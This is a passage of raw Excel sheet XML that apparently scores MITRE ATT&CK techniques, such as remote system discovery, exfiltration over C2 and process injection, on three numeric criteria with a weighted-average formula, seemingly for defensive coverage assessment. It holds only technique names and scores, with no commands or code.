        <v>3.2</v>
      </c>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A19" s="43" t="s">
        <v>75</v>
      </c>
      <c r="B19" s="41" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:B)</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="C19" s="45" t="s">
        <v>643</v>
      </c>
      <c r="D19" s="14">
        <v>3</v>
      </c>
      <c r="E19" s="14">
        <v>4</v>
      </c>
      <c r="F19" s="14">
        <v>4</v>
      </c>
      <c r="G19" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A20" s="43" t="s">
        <v>77</v>
      </c>
      <c r="B20" s="41" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:B)</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="C20" s="45" t="s">
        <v>3032</v>
      </c>
      <c r="D20" s="14">
        <v>0</v>
      </c>
      <c r="E20" s="14">
        <v>1</v>
      </c>
      <c r="F20" s="14">
        <v>3</v>
      </c>
      <c r="G20" s="32">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A21" s="43" t="s">
        <v>79</v>
      </c>
      <c r="B21" s="41" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:B)</f>
        <v>Automated Exfiltration</v>
      </c>
      <c r="C21" s="45" t="s">
        <v>647</v>
      </c>
      <c r="D21" s="14">
        <v>1</v>
      </c>
      <c r="E21" s="14">
        <v>3</v>
      </c>
      <c r="F21" s="14">
        <v>4</v>
      </c>
      <c r="G21" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A22" s="43" t="s">
        <v>80</v>
      </c>
      <c r="B22" s="41" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:B)</f>
        <v>Remote Services</v>
      </c>
      <c r="C22" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D22" s="14">
        <v>2</v>
      </c>
      <c r="E22" s="14">
        <v>3</v>
      </c>
      <c r="F22" s="14">
        <v>4</v>
      </c>
      <c r="G22" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A23" s="43" t="s">
        <v>81</v>
      </c>
      <c r="B23" s="41" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C23" s="45" t="s">
        <v>763</v>
      </c>
      <c r="D23" s="14">
        <v>1</v>
      </c>
      <c r="E23" s="14">
        <v>3</v>
      </c>
      <c r="F23" s="14">
        <v>5</v>
      </c>
      <c r="G23" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A24" s="43" t="s">
        <v>83</v>
      </c>
      <c r="B24" s="41" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C24" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D24" s="14">
        <v>2</v>
      </c>
      <c r="E24" s="14">
        <v>4</v>
      </c>
      <c r="F24" s="14">
        <v>5</v>
      </c>
      <c r="G24" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A25" s="43" t="s">
        <v>84</v>
      </c>
      <c r="B25" s="41" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C25" s="45" t="s">
        <v>697</v>
      </c>
      <c r="D25" s="14">
        <v>1</v>
      </c>
      <c r="E25" s="14">
        <v>3</v>
      </c>
      <c r="F25" s="14">
        <v>4</v>
      </c>
      <c r="G25" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A26" s="43" t="s">
        <v>85</v>
      </c>
      <c r="B26" s="41" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:B)</f>
        <v>Data from Removable Media</v>
      </c>
      <c r="C26" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D26" s="14">
        <v>1</v>
      </c>
      <c r="E26" s="14">
        <v>2</v>
      </c>
      <c r="F26" s="14">
        <v>3</v>
      </c>
      <c r="G26" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A27" s="43" t="s">
        <v>86</v>
      </c>
      <c r="B27" s="41" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:B)</f>
        <v>Multiband Communication</v>
      </c>
      <c r="C27" s="45" t="s">
        <v>697</v>
      </c>
      <c r="D27" s="14">
        <v>1</v>
      </c>
      <c r="E27" s="14">
        <v>3</v>
      </c>
      <c r="F27" s="14">
        <v>4</v>
      </c>
      <c r="G27" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A28" s="43" t="s">
        <v>87</v>
      </c>
      <c r="B28" s="41" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:B)</f>
        <v>Obfuscated Files or Information</v>
      </c>
      <c r="C28" s="45" t="s">
        <v>701</v>
      </c>
      <c r="D28" s="14">
        <v>1</v>
      </c>
      <c r="E28" s="14">
        <v>2</v>
      </c>
      <c r="F28" s="14">
        <v>4</v>
      </c>
      <c r="G28" s="32">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="29" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A29" s="43" t="s">
        <v>89</v>
      </c>
      <c r="B29" s="41" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal from Tools</v>
      </c>
      <c r="C29" s="45" t="s">
        <v>3033</v>
      </c>
      <c r="D29" s="14">
        <v>4</v>
      </c>
      <c r="E29" s="14">
        <v>4</v>
      </c>
      <c r="F29" s="14">
        <v>5</v>
      </c>
      <c r="G29" s="32">
        <f t="shared" si="0"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="30" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A30" s="43" t="s">
        <v>91</v>
      </c>
      <c r="B30" s="41" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:B)</f>
        <v>Scheduled Transfer</v>
      </c>
      <c r="C30" s="45" t="s">
        <v>733</v>
      </c>
      <c r="D30" s="14">
        <v>2</v>
      </c>
      <c r="E30" s="14">
        <v>3</v>
      </c>
      <c r="F30" s="14">
        <v>5</v>
      </c>
      <c r="G30" s="32">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="31" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A31" s="43" t="s">
        <v>92</v>
      </c>
      <c r="B31" s="41" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C31" s="45" t="s">
        <v>737</v>
      </c>
      <c r="D31" s="14">
        <v>1</v>
      </c>
      <c r="E31" s="14">
        <v>2</v>
      </c>
      <c r="F31" s="14">
        <v>3</v>
      </c>
      <c r="G31" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="32" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A32" s="43" t="s">
        <v>94</v>
      </c>
      <c r="B32" s="41" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C32" s="45" t="s">
        <v>2563</v>
      </c>
      <c r="D32" s="14">
        <v>3</v>
      </c>
      <c r="E32" s="14">
        <v>4</v>
      </c>
      <c r="F32" s="14">
        <v>5</v>
      </c>
      <c r="G32" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="33" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A33" s="43" t="s">
        <v>96</v>
      </c>
      <c r="B33" s="41" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C33" s="45" t="s">
        <v>3034</v>
      </c>
      <c r="D33" s="14">
        <v>1</v>
      </c>
      <c r="E33" s="14">
        <v>2</v>
      </c>
      <c r="F33" s="14">
        <v>3</v>
      </c>
      <c r="G33" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="34" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A34" s="43" t="s">
        <v>98</v>
      </c>
      <c r="B34" s="41" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:B)</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="C34" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D34" s="14">
        <v>4</v>
      </c>
      <c r="E34" s="14">
        <v>4</v>
      </c>
      <c r="F34" s="14">
        <v>5</v>
      </c>
      <c r="G34" s="32">
        <f t="shared" si="0"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="35" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A35" s="43" t="s">
        <v>100</v>
      </c>
      <c r="B35" s="41" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:B)</f>
        <v>Path Interception</v>
      </c>
      <c r="C35" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D35" s="14">
        <v>3</v>
      </c>
      <c r="E35" s="14">
        <v>4</v>
      </c>
      <c r="F35" s="14">
        <v>5</v>
      </c>
      <c r="G35" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="36" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A36" s="43" t="s">
        <v>101</v>
      </c>
      <c r="B36" s="41" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:B)</f>
        <v>Path Interception</v>
      </c>
      <c r="C36" s="45" t="s">
        <v>631</v>
      </c>
      <c r="D36" s="14">
        <v>3</v>
      </c>
      <c r="E36" s="14">
        <v>4</v>
      </c>
      <c r="F36" s="14">
        <v>5</v>
      </c>
      <c r="G36" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="37" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A37" s="43" t="s">
        <v>102</v>
      </c>
      <c r="B37" s="41" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:B)</f>
        <v>Masquerading</v>
      </c>
      <c r="C37" s="45" t="s">
        <v>754</v>
      </c>
      <c r="D37" s="14">
        <v>2</v>
      </c>
      <c r="E37" s="14">
        <v>3</v>
      </c>
      <c r="F37" s="14">
        <v>5</v>
      </c>
      <c r="G37" s="32">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="38" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A38" s="43" t="s">
        <v>103</v>
      </c>
      <c r="B38" s="41" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:B)</f>
        <v>Boot or Logon Initialization Scripts</v>
      </c>
      <c r="C38" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D38" s="14">
        <v>3</v>
      </c>
      <c r="E38" s="14">
        <v>4</v>
      </c>
      <c r="F38" s="14">
        <v>5</v>
      </c>
      <c r="G38" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="39" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A39" s="43" t="s">
        <v>105</v>
      </c>
      <c r="B39" s="41" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:B)</f>
        <v>Startup Items</v>
      </c>
      <c r="C39" s="45" t="s">
        <v>3035</v>
      </c>
      <c r="D39" s="14">
        <v>2</v>
      </c>
      <c r="E39" s="14">
        <v>4</v>
      </c>
      <c r="F39" s="14">
        <v>4</v>
      </c>
      <c r="G39" s="32">
        <f t="shared" si="0"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="40" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A40" s="43" t="s">
        <v>106</v>
      </c>
      <c r="B40" s="41" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:B)</f>
        <v>Data from Network Shared Drive</v>
      </c>
      <c r="C40" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D40" s="14">
        <v>2</v>
      </c>
      <c r="E40" s="14">
        <v>4</v>
      </c>
      <c r="F40" s="14">
        <v>5</v>
      </c>
      <c r="G40" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A41" s="43" t="s">
        <v>108</v>
      </c>
      <c r="B41" s="41" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:B)</f>
        <v>Network Sniffing</v>
      </c>
      <c r="C41" s="45" t="s">
        <v>809</v>
      </c>
      <c r="D41" s="14">
        <v>2</v>
      </c>
      <c r="E41" s="14">
        <v>3</v>
      </c>
      <c r="F41" s="14">
        <v>4</v>
      </c>
      <c r="G41" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A42" s="43" t="s">
        <v>110</v>
      </c>
      <c r="B42" s="41" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="C42" s="45" t="s">
        <v>622</v>
      </c>
      <c r="D42" s="14">
        <v>2</v>
      </c>
      <c r="E42" s="14">
        <v>3</v>
      </c>
      <c r="F42" s="14">
        <v>4</v>
      </c>
      <c r="G42" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A43" s="43" t="s">
        <v>112</v>
      </c>
      <c r="B43" s="41" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="C43" s="45" t="s">
        <v>631</v>
      </c>
      <c r="D43" s="14">
        <v>1</v>
      </c>
      <c r="E43" s="14">
        <v>3</v>
      </c>
      <c r="F43" s="14">
        <v>4</v>
      </c>
      <c r="G43" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A44" s="43" t="s">
        <v>113</v>
      </c>
      <c r="B44" s="41" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C44" s="45" t="s">
        <v>737</v>
      </c>
      <c r="D44" s="14">
        <v>1</v>
      </c>
      <c r="E44" s="14">
        <v>3</v>
      </c>
      <c r="F44" s="14">
        <v>4</v>
      </c>
      <c r="G44" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A45" s="43" t="s">
        <v>115</v>
      </c>
      <c r="B45" s="41" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C45" s="45" t="s">
        <v>3036</v>
      </c>
      <c r="D45" s="14">
        <v>2</v>
      </c>
      <c r="E45" s="14">
        <v>3</v>
      </c>
      <c r="F45" s="14">
        <v>4</v>
      </c>
      <c r="G45" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="46" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A46" s="43" t="s">
        <v>116</v>
      </c>
      <c r="B46" s="41" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C46" s="45" t="s">
        <v>713</v>
      </c>
      <c r="D46" s="14">
        <v>0</v>
      </c>
      <c r="E46" s="14">
        <v>1</v>
      </c>
      <c r="F46" s="14">
        <v>4</v>
      </c>
      <c r="G46" s="32">
        <f t="shared" si="0"/>
        <v>1.2</v>
      </c>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A47" s="43" t="s">
        <v>117</v>
      </c>
      <c r="B47" s="41" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:B)</f>
        <v>Network Service Scanning</v>
      </c>
      <c r="C47" s="45" t="s">
        <v>819</v>
      </c>
      <c r="D47" s="14">
        <v>2</v>
      </c>
      <c r="E47" s="14">
        <v>3</v>
      </c>
      <c r="F47" s="14">
        <v>4</v>
      </c>
      <c r="G47" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="48" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A48" s="43" t="s">
        <v>118</v>
      </c>
      <c r="B48" s="41" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:B)</f>
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="C48" s="45" t="s">
        <v>824</v>
      </c>
      <c r="D48" s="14">
        <v>2</v>
      </c>
      <c r="E48" s="14">
        <v>4</v>
      </c>
      <c r="F48" s="14">
        <v>4</v>
      </c>
      <c r="G48" s="32">
        <f t="shared" si="0"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A49" s="43" t="s">
        <v>119</v>
      </c>
      <c r="B49" s="41" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="C49" s="45" t="s">
        <v>3037</v>
      </c>
      <c r="D49" s="14">
        <v>1</v>
      </c>
      <c r="E49" s="14">
        <v>3</v>
      </c>
      <c r="F49" s="14">
        <v>4</v>
      </c>
      <c r="G49" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A50" s="43" t="s">
        <v>121</v>
      </c>
      <c r="B50" s="41" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:B)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="C50" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D50" s="14">
        <v>3</v>
      </c>
      <c r="E50" s="14">
        <v>4</v>
      </c>
      <c r="F50" s="14">
        <v>5</v>
      </c>
      <c r="G50" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A51" s="43" t="s">
        <v>123</v>
      </c>
      <c r="B51" s="41" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:B)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="C51" s="45" t="s">
        <v>768</v>
      </c>
      <c r="D51" s="14">
        <v>4</v>
      </c>
      <c r="E51" s="14">
        <v>4</v>
      </c>
      <c r="F51" s="14">
        <v>5</v>
      </c>
      <c r="G51" s="32">
        <f t="shared" si="0"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A52" s="43" t="s">
        <v>124</v>
      </c>
      <c r="B52" s="41" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:B)</f>
        <v>Shared Webroot</v>
      </c>
      <c r="C52" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D52" s="14">
        <v>2</v>
      </c>
      <c r="E52" s="14">
        <v>3</v>
      </c>
      <c r="F52" s="14">
        <v>4</v>
      </c>
      <c r="G52" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A53" s="43" t="s">
        <v>125</v>
      </c>
      <c r="B53" s="41" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Physical Medium</v>
      </c>
      <c r="C53" s="45" t="s">
        <v>3038</v>
      </c>
      <c r="D53" s="14">
        <v>2</v>
      </c>
      <c r="E53" s="14">
        <v>3</v>
      </c>
      <c r="F53" s="14">
        <v>3</v>
      </c>
      <c r="G53" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A54" s="43" t="s">
        <v>127</v>
      </c>
      <c r="B54" s="41" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:B)</f>
        <v>Scheduled Task/Job</v>
      </c>
      <c r="C54" s="45" t="s">
        <v>859</v>
      </c>
      <c r="D54" s="14">
        <v>3</v>
      </c>
      <c r="E54" s="14">
        <v>4</v>
      </c>
      <c r="F54" s="14">
        <v>5</v>
      </c>
      <c r="G54" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A55" s="43" t="s">
        <v>129</v>
      </c>
      <c r="B55" s="41" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:B)</f>
        <v>Systemd Timers</v>
      </c>
      <c r="C55" s="45" t="s">
        <v>3039</v>
      </c>
      <c r="D55" s="14">
        <v>2</v>
      </c>
      <c r="E55" s="14">
        <v>3</v>
      </c>
      <c r="F55" s="14">
        <v>4</v>
      </c>
      <c r="G55" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A56" s="43" t="s">
        <v>131</v>
      </c>
      <c r="B56" s="41" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:B)</f>
        <v>Process Injection</v>
      </c>
      <c r="C56" s="45" t="s">
        <v>3040</v>
      </c>
      <c r="D56" s="14">
        <v>3</v>
      </c>
      <c r="E56" s="14">
        <v>4</v>
      </c>
      <c r="F56" s="14">
        <v>5</v>
      </c>
      <c r="G56" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A57" s="43" t="s">
        <v>133</v>
      </c>
      <c r="B57" s="41" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:B)</f>
        <v>Input Capture</v>
      </c>
      <c r="C57" s="45" t="s">
        <v>3041</v>
      </c>
      <c r="D57" s="14">
        <v>1</v>
      </c>
      <c r="E57" s="14">
        <v>3</v>
      </c>
      <c r="F57" s="14">
        <v>4</v>
      </c>
      <c r="G57" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A58" s="43" t="s">
        <v>135</v>
      </c>
      <c r="B58" s="41" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:B)</f>
        <v>Process Discovery</v>
      </c>
      <c r="C58" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D58" s="14">
        <v>4</v>
      </c>
      <c r="E58" s="14">
        <v>4</v>
      </c>
      <c r="F58" s="14">
        <v>5</v>
      </c>
      <c r="G58" s="32">
        <f t="shared" si="0"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A59" s="43" t="s">
        <v>136</v>
      </c>
      <c r="B59" s="41" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:B)</f>
        <v>Process Discovery</v>
      </c>
      <c r="C59" s="45" t="s">
        <v>3042</v>
      </c>
      <c r="D59" s="14">
        <v>2</v>
      </c>
      <c r="E59" s="14">
        <v>3</v>
      </c>
      <c r="F59" s="14">
        <v>4</v>
      </c>
      <c r="G59" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A60" s="43" t="s">
        <v>138</v>
      </c>
      <c r="B60" s="41" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:B)</f>
        <v>Command and Scripting Interpreter</v>
      </c>
      <c r="C60" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D60" s="14">
        <v>2</v>
      </c>
      <c r="E60" s="14">
        <v>4</v>
      </c>
      <c r="F60" s="14">
        <v>5</v>
      </c>
      <c r="G60" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A61" s="43" t="s">
        <v>139</v>
      </c>
      <c r="B61" s="41" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:B)</f>
        <v>Network Device CLI</v>
      </c>
      <c r="C61" s="45" t="s">
        <v>2014</v>
      </c>
      <c r="D61" s="14">
        <v>3</v>
      </c>
      <c r="E61" s="14">
        <v>4</v>
      </c>
      <c r="F61" s="14">
        <v>5</v>
      </c>
      <c r="G61" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A62" s="43" t="s">
        <v>141</v>
      </c>
      <c r="B62" s="41" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:B)</f>
        <v>Graphical User Interface</v>
      </c>
      <c r="C62" s="45" t="s">
        <v>763</v>
      </c>
      <c r="D62" s="14">
        <v>1</v>
      </c>
      <c r="E62" s="14">
        <v>3</v>
      </c>
      <c r="F62" s="14">
        <v>5</v>
      </c>
      <c r="G62" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A63" s="43" t="s">
        <v>142</v>
      </c>
      <c r="B63" s="41" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:B)</f>
        <v>Hypervisor</v>
      </c>
      <c r="C63" s="45" t="s">
        <v>1018</v>
      </c>
      <c r="D63" s="14">
        <v>0</v>
      </c>
      <c r="E63" s="14">
        <v>1</v>
      </c>
      <c r="F63" s="14">
        <v>2</v>
      </c>
      <c r="G63" s="32">
        <f t="shared" si="0"/>
        <v>0.8</v>
      </c>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A64" s="43" t="s">
        <v>143</v>
      </c>
      <c r="B64" s="41" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:B)</f>
        <v>Hypervisor</v>
      </c>
      <c r="C64" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D64" s="14">
        <v>3</v>
      </c>
      <c r="E64" s="14">
        <v>4</v>
      </c>
      <c r="F64" s="14">
        <v>4</v>
      </c>
      <c r="G64" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A65" s="43" t="s">
        <v>145</v>
      </c>
      <c r="B65" s="41" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C65" s="45" t="s">
        <v>1023</v>
      </c>
      <c r="D65" s="14">
        <v>2</v>
      </c>
      <c r="E65" s="14">
        <v>3</v>
      </c>
      <c r="F65" s="14">
        <v>4</v>
      </c>
      <c r="G65" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A66" s="43" t="s">
        <v>147</v>
      </c>
      <c r="B66" s="41" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C66" s="45" t="s">
        <v>733</v>
      </c>
      <c r="D66" s="14">
        <v>3</v>
      </c>
      <c r="E66" s="14">
        <v>4</v>
      </c>
      <c r="F66" s="14">
        <v>5</v>
      </c>
      <c r="G66" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A67" s="43" t="s">
        <v>148</v>
      </c>
      <c r="B67" s="41" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C67" s="45" t="s">
        <v>3043</v>
      </c>
      <c r="D67" s="14">
        <v>3</v>
      </c>
      <c r="E67" s="14">
        <v>4</v>
      </c>
      <c r="F67" s="14">
        <v>4</v>
      </c>
      <c r="G67" s="32">
        <f t="shared" ref="G67:G130" si="1">((D67*2)+(E67*2)+F67)/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="68" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A68" s="43" t="s">
        <v>149</v>
      </c>
      <c r="B68" s="41" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C68" s="45" t="s">
        <v>3044</v>
      </c>
      <c r="D68" s="14">
        <v>0</v>
      </c>
      <c r="E68" s="14">
        <v>0</v>
      </c>
      <c r="F68" s="14">
        <v>3</v>
      </c>
      <c r="G68" s="32">
        <f t="shared" si="1"/>
        <v>0.6</v>
      </c>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A69" s="43" t="s">
        <v>151</v>
      </c>
      <c r="B69" s="41" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Privilege Escalation</v>
      </c>
      <c r="C69" s="45" t="s">
        <v>1029</v>
      </c>
      <c r="D69" s="14">
        <v>1</v>
      </c>
      <c r="E69" s="14">
        <v>3</v>
      </c>
      <c r="F69" s="14">
        <v>4</v>
      </c>
      <c r="G69" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
